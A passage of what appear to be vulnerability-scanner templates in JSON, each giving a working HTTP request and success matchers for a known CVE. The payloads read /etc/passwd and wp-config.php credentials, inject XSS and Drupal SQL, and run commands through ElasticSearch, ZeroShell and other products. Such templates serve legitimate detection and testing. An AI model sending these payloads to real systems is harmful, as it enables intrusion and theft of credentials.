{{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Video Gallery WordPress DZS"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-9180","info":{"name":"Eleanor CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/go.php?http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4577","info":{"name":"WP AmASIN \u2013 The Amazon Affiliate Shop - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5187","info":{"name":"Tom M8te (tom-m8te) Plugin 1.5.3 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/tom-m8te/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/tom-m8te/tom-download-file.php?file=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/shortcode-ninja/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5181","info":{"name":"Last.fm Rotation 1.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/lastfm-rotation/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4941","info":{"name":"Cross RSS 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/cross-rss/\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-1681","info":{"name":"Cherokee HTTPD <=0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2006-2842","info":{"name":"Squirrelmail <=1.4.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ClickDesk Live Support - Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/alert-before-your-post/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Grand Flagallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Skysa App"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Adminimize ==="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Featurific For Wordpress"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4640","info":{"name":"WebTitan < 3.60 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login-x.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login-x.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\njaction=login&language=en_US&username={{username}}&password={{password}}\n","GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"success\\\":true\")","contains(body_1, \"WebTitan\")","regex('root:.*:0:0:', body)","status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / 